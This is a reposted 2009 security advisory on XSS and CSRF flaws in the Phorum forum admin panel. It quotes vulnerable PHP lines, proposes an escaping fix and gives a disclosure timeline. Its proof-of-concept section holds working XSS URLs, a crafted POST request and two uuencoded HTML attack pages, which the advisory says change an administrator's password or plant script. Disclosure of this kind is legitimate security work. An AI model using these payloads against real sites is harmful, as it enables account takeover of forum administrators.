Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  SEC Consult SA-20090415-0 :: Multiple Vulnerabilities in Novell Teaming

  Geeklog <= 1.5.2 savepreferences()
/*blocks[] remote sql injection exploit

  webSPELL 4.2.0c--XSS (BYPASS BBCODE) COOKIES STEALING VULNERABILITY--

  DDIVRT-2009-23 Apache ActiveMQ Numerous Cross Site Scripting Issues

From:research_(at)_voodoo-labs.org <research_(at)_voodoo-labs.org>
Date:17 апреля 2009 г.
Subject:Phorum < 5.2.10 Cross-Site Scripting/Request Forgery

#=cicatriz <[email protected]
org>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories
)=#
                                    /)           /)     /)                   
                       _ _  _______(/ ________  // _   (/_ _       _____  _  
                       (/__(_)(_)(_(_(_)(
_)    (/_(_(_/_) /_)_ o  (_)/ (_(_/_
                                                                        .-/  
#=Phorum < 5.2.10 Cross-Site Scripting/Request Forgery=#=~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Advisory & Vulnerability Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=#

       Title: Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
       Advisory ID: VUDO-2009-1504
       Advisory URL: http://research.voodoo-labs.org/advisories/4
       Date founded: 10-4-2009
       Vendors contacted: Phorum
       Class: Multiple Vulnerabilities
       Remotely Exploitable: Yes
       Localy Exploitable: No
       Exploit/PoC Available: Yes
       Policy: Full Disclosure Policy (RFPolicy) v2.0

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Tested & Vulnerable packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~=#

       [+] Phorum 5.2.10
       [+] Phorum 5.2-dev

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Solutions and Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~=#

Phorum released some important fixes for the Cross-Site Scripting vulnerabilities [1]

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Technical Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~=#

Phorum [2] suffers from a series of Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)
vulnerabilities, trough the admin panel and the "file uploading" section (with an XML file but it only works
if you are using Mozilla Firefox as browser and a crafted XUL file). Some other vulnerabilities:

[*] Cross-Site Scripting (XSS):
       
       The most simple XSS can be executed easily and the error can be found on the file
       "include/admin/banlist.php":
       
       +++include/admin/banlist.php @@ 88:104
           88      if($_GET["curr"] && $_GET["delete"]){
           89  
           90          ?>
           91  
           92          <div class="PhorumInfoMessage">
           93              Are you sure you want to delete this entry?
           94              <form action="<?php echo $PHORUM["admin_http_path"] ?>" method="post">
           95                  <input type="hidden" name="module" value="<?php echo $module; ?>" />
XXX         96                  <input type="hidden" name="curr" value="<?php echo $_GET['curr']; ?>" />
           97                  <input type="hidden" name="delete" value="1" />
           98                  <input type="submit" name="confirm" value="Yes" />&nbsp;<input type="submit"
           name="confirm" value="No" />
           99              </form>
          100          </div>
          101  
          102          <?php
          103  
          104      } else {
       ---include/admin/banlist.php
       
       The same security flaw can be found in the file "include/admin/banlist.php", line 94, and can be also
       exploited with a single GET petition.
       Here's another XSS attack but more difficult to be exploited, because you need to modify the user's
       cookies to store the vector and redirect him to the "versioncheck.php" file:
       
       +++versioncheck.php @@ 79:83
           79    <?php if ($upgrade_available) { ?>
           80      <div class="notify_upgrade">
XXX         81        <a target="_top" href="admin.php?module=version">New Phorum version <?php print
               $upgrade_available ?> available!</a>
           82      </div>
           83    <?php } else { ?>
       ---versioncheck.php

       There's another XSS on the file "include/admin/users.php" but it can only be exploited from a POST
       request on this lines:
       
       +++include/admin/users.php @@ 87:93
           87          //check for a valid email
           88          if (!empty($_POST["email"])) {
           89              include('./include/email_functions.php');
           90              $valid_email = phorum_valid_email($_POST["email"]);
           91              if ($valid_email !== true)
XXX         92                  $error = "The email \"$_POST[email]\" is not valid!";
           93          }
       ---include/admin/users.php
       
       Also the line 82, on the same file, its vulnerable to the same attack.
       In the users.php file there's another vulnerable line, trough the request Referer parameter or
       $_POST['referrer'].
       
       +++include/admin/users.php @@ 52:59
           52  if (isset($_POST['referrer'])) {
XXX         53      $referrer = $_POST['referrer'];
           54      unset($_POST['referrer']);
           55  } elseif (isset($_SERVER['HTTP_REFERER'])) {
XXX         56      $referrer = $_SERVER['HTTP_REFERER'];
           57  } else {
           58      $rererrer = "{$PHORUM["admin_http_path"]}?module=users";
           59  }
       ---include/admin/users.php
       +++include/admin/users.php @@ 659:661
          659  
XXX        660      $frm->hidden("referrer", $referrer);
          661  
       ---include/admin/users.php

       A way to fix this can be done using htmlspecialchars() or htmlentities() and any other function that
       does a sanity check, i.e:
       
       +++
       <input type="hidden" name="curr" value="<?php echo htmlentities($_GET['curr'], ENT_QUOTES,
       'UTF-8'); ?>" />
       ---
       
       
[*] Cross-Site Request Forgery (CSRF):
       
       All the forms on the admin panel it's vulnerable to CSRF because of the lack of security tokens to
       check if the administrator really wants to do those actions. Without a token an attacker can create
       a new user as admin or change the administrator passwords and other personal data. Another type of
       action can be done with a simple bbcode [img] tag. When the administrator see the [img] tag with a
       special crafted URL, an action, such as delete a topic, could be executed.
       A more dangerous attack can lead to JavaScript execution.
       
       
[3] Other vulnerabilities were founded on this application. (WHK)

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~=#

[*] Cross-Site Scripting (XSS):

       +++
       http://localhost/phorum-5.2.10/admin.
php?module=banlist&curr=1"><img/src/onerror="alert('v
oodoo');
       &delete=1
       ---
       
       +++
       http://www.victim.com/phorum-5.2.10/admin.php?module=badwords&curr=1"
><img/src/onerror="
       alert('voodoo');&delete=1
       ---
       
       +++
       javascript:with(document)cookie="phorum_upgrade_available=
       <iframe/src='javascript:alert(/voodoo/.
source)'>",
       location="http://www.victim.com/phorum-5.2.10/versioncheck.php";

       ---
       
       +++
       POST /phorum-5.2.10/admin.php HTTP/1.1
       
       module=users&referrer=http%3A%2F%2Fwww.victim.
com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers
       &addUser=1&username=xss&real_name=xss&
       email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%
27voodoo%27%29%3B%22%3E&password1=xss&password2=xss
       &admin=0
       ---
       
[*] Cross-Site Request Forgery (CSRF):

       Other CSRF proof-of-concept exploits can be found on:
               [*] http://research.voodoo-labs.org/code/exploits/phorum/5.2.10/
               
       If the administrator see this special crafted HTML page, his password will be changed to a string
       specified by the attacker. (uuencoded)
       
       +++
       begin 644 attack.html
       M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,
3`@(F5D:71U<V5R(B!#
       M4U)&(&%T=&%C:SPO:
#$^"@D\9F]R;2!A8W1I;VX](FAT='`Z+R]W=W<N=FEC
       M=&EM+F-O;2]P:&]R=6TM-2XR+C$P+V%D;6EN+G!H<"(@;65T:
&]D/2)03U-4
       M(CX*"0D\:[email protected];F%M93TB;6]D=6QE(B!V86QU93TB=7-
E<G,B('1Y<&4]
       M(FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](
G-E8W1I;VXB('9A;'5E/2)M86EN
       M(B!T>7!E/2)H:
61D96XB/@H)"3QI;G!U="!N86UE/2)R969E<G)E<B(@=F%
L
       M=64](FAT='`Z+R]W=W<N=FEC=&EM+F-O;2]P:&]R=6TM-
2XR+C$P+V%D;6EN
       M+G!H<"(@='EP93TB:&ED9&5N(CX*"0D\:
[email protected];F%M93TB=7-E<E]I9"(@
       M=F%L=64](C$B('1Y<&4](FAI9&1E;B(^"
@D)/&EN<'5T(&YA;64](G)E86Q?
       M;F%M92(@<VEZ93TB-
3`B('9A;'5E/2(B('1Y<&4](FAI9&1E;B(
^"@D)/&EN
       M<'5T(&YA;64](F5M86EL(B!S:7IE/2(U,
"(@=F%L=64](F%D;6EN0'=E8FUA
       M<W1E<BYC;VTB('1Y<&4](FAI9&1E;B(^"@D
)/&EN<'5T(&YA;64](G!A<W-W
       M;W)D,2(@=F%L=64](G!W;F5D(B!T>7!E/2)H:
61D96XB/@H)"3QI;G!U="!N
       M86UE/2)P87-
S=V]R9#(B('9A;'5E/2)P=VYE9"(@='EP93TB:
&ED9&5N(CX*
       M"0D\=&5X=&%[email protected]<W1Y;&4](G=I9'1H.
C!P>#MH96EG:'0Z,'!X.V)O<F1E
       M<CHP<'@[(B!N86UE/2)S:6=N871U<F4B(&-O;',
](C,P(B!R;W=S/2(U(CYV
       M;V]D;V\\+W1E>'1A<F5A/@H)"[email protected]<W1Y;&
4](G=I9'1H.C!P>#MH
       M96EG:'0Z,'!X.
V)O<F1E<CHP<'@[(B!N86UE/2)A8W1I=F4B/@H)"0D\
;W!T
       M:6]N('9A;'5E/2(P(CY.;SPO;W!T:
6]N/@H)"0D\;W!T:6]N('9A;'5E/2(Q
       M(B!S96QE8W1E9#TB<V5L96-T960B/EEE<SPO;W!T:
6]N/@H)"3PO<V5L96-T
       M/@H)"[email protected]<W1Y;&4](G=I9'1H.C!P>#MH96EG:
'0Z,'!X.V)O<F1E
       M<CHP<'@[(B!N86UE/2)A9&UI;B(^"@D)"
3QO<'1I;[email protected]=F%L=64](C`B/DYO
       M/"]O<'1I;VX^"@D)"3QO<'1I;[email protected]=F%L=64]
(C$B('-E;&5C=&5D/2)S96QE
       M8W1E9"(^665S/"]O<'1I;VX^"@D)/"]S96QE8W
0^"@D)/&EN<'5T('9A;'5E
       M/2)5<&1A=&4B(&-L87-
S/2)I;G!U="UF;W)M+7-U8FUI="(@='EP93TB:&ED
       M9&5N(CX*"3PO9F]R;3X*"3QS8W)I<'0^<V5T5&
EM96]U="AF=6YC=&EO;[email protected]
       M>V1O8W5M96YT+F9O<FUS6S!=+G-U8FUI="@I.WTL,'@U,#`I.
SPO<V-R:7!T
       3/@H\+V)O9'D^"CPO:'1M;#X*"@``
       `
       end
       ---
       
[*] CSRF + XSS:

       This is another way to exploit those two types of attacks (XSS and CSRF). If the administrator see
       this page a new folder will be created and the name is going to be a special HTML tag with a
       JavaScript script. (uuencoded)
       
       +++
       begin 644 attack.html
       M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,
3`@(FYE=V9O;&1E<B(@
       M0U-21BM84U,@871T86-K/"]H,
3X*"3QF;W)M(&%C=&EO;CTB:'1T<#HO+W=W
       M=RYV:6-T:6TN8V]M+W!H;W)U;2TU+C(N,3`O861M:
6XN<&AP(B!M971H;V0]
       M(E!/4U0B/@H)"3QI;G!U="!T>7!E/2)H:
61D96XB(&YA;64](F9O;&1E<E]F
       M;&%G(B!V86QU93TB,
2(^"@D)/&EN<'5T('1Y<&4](FAI9&1E;B(
@;F%M93TB
       M;6]D=6QE(B!V86QU93TB;F5W9F]L9&5R(CX*"0D\:
[email protected]='EP93TB:&ED
       M9&5N(B!N86UE/2)N86UE(B!S:7IE/2(S,
"(@=F%L=64](B9L=#MI9G)A;64O
       M<W)C/2=J879A<V-R:7!T.F%L97)T*"]V;V]D;V\O+G-
O=7)C92D[)R9G=#LB
       M(#X\+W1D/@H)"3QT97AT87)E82!N86UE/2)D97-
C<FEP=&EO;B(@8V]L<STB
       M-C`B(')O=W,](C$P(B!S='EL93TB=VED=&@Z,
'!X.VAE:6=H=#HP<'@[8F]R
       M9&5R.
C!P>#LB/CPO=&5X=&%R96$^/"]T9#X*"0D\<V5L96-
T('-T>6QE/2)W
       M:61T:#HP<'@[:&5I9VAT.C!P>#MB;W)D97(Z,'!X.
R(@;F%M93TB<&%R96YT
       M7VED(B`^"@D)"3QO<'1I;[email protected]=F%L=64](C$B
('-E;&5C=&5D/2)S96QE8W1E
       M9"(^+2U.;VYE+2T\+V]P=&EO;CX*"0D\+W-
E;&5C=#X*"0D\<V5L96-T('-T
       M>6QE/2)W:61T:#HP<'@[:&5I9VAT.
C!P>#MB;W)D97(Z,'!X.R(@;F%M93TB
       M86-T:
79E(B`^"@D)"3QO<'1I;[email protected]=F%L=64](C`B/DYO/
"]O<'1I;VX^"@D)
       M"3QO<'1I;[email protected]=F%L=64](C$B('-
E;&5C=&5D/2)S96QE8W1E9"(^665S/"]O
       M<'1I;VX^"@D)/"]S96QE8W0^"@D)/'-
E;&5C="!S='EL93TB=VED=&@Z,'!X
       M.VAE:6=H=#HP<'@[8F]R9&5R.
C!P>#LB(&YA;64](G1E;7!L871E(B`^"@D)
       M"3QO<'1I;[email protected]=F%L=64](F5M97)A;&0B('-
E;&5C=&5D/2)S96QE8W1E9"(^
       M4&AO<G5M($5M97)A;&[email protected]&5M<&QA=&[email protected],
2XP/"]O<'1I;VX^"@D)"3QO<'1I
       M;[email protected]=F%L=64](F-L87-S:6,B/D-L87-S:6,
@4&AO<G5M(%1E;7!L871E(#`N
       M-#PO;W!T:6]N/@H)"0D\;W!T:6]N('9A;'5E/2)L:
6=H='=E:6=H="(^4&AO
       M<G5M($QI9VAT=V5I9VAT(%1E;7!L871E(#$N,#PO;W!T:
6]N/@H)"3PO<V5L
       M96-T/@H)"[email protected]<W1Y;&4](G=I9'1H.
C!P>#MH96EG:'0Z,'!X.V)O
       M<F1E<CHP<'@[(B!N86UE/2)L86YG=6%G92(@/@H)
"0D\;W!T:6]N('9A;'5E
       M/2)E;F=L:7-H(CY%;F=L:7-H("A!;65R:6-
A;BD\+V]P=&EO;CX*"0D\+W-E
       M;&5C=#X*"0D\:[email protected]='EP93TB:
&ED9&5N(B!I9#TB861M:6Y?8VAE8VMB
       M;WA?,
2(@;F%M93TB=G)O;W0B('9A;'5E/2(Q(CX*"0D\:
[email protected]='EP93TB
       M:&ED9&5N(B!V86QU93TB4W5B;6ET(B!C;&%S<STB:
6YP=70M9F]R;2US=6)M
       M:70B/@H)/"]F;W)M/@H)/'-C<FEP=#YS9714:
6UE;W5T*&9U;F-T:6]N*"E[
       M9&]C=6UE;G0N9F]R;7-;,%TN<W5B;6ET*"D[?2PP>#4P,
"D[/"]S8W)I<'0^
       2"CPO8F]D>3X*/"]H=&UL/@H*
       `
       end
       ---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Reporting Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~=#

       [*] 10-04-2009: Bugs discovered.
       [*] 10-04-2009: Voodoo contacted the vendor (advisory draft included).
       [*] 13-04-2009: The vendor released fixes for Cross-Site Scripting vulnerabilities.
       [*] 15-04-2009: Advisory VUDO-2009-1504 published.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

       [1] http://trac.phorum.org/changeset/4009
       [2] http://www.phorum.org/
       [3] http://foro.elhacker.net/nivel_web/multiples_fallas_en_phorum_5210-t248300.0.html


#=cicatriz <[email protected]
org>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories
)=#
#=miй 15 abr 2009 ART=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~=#

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород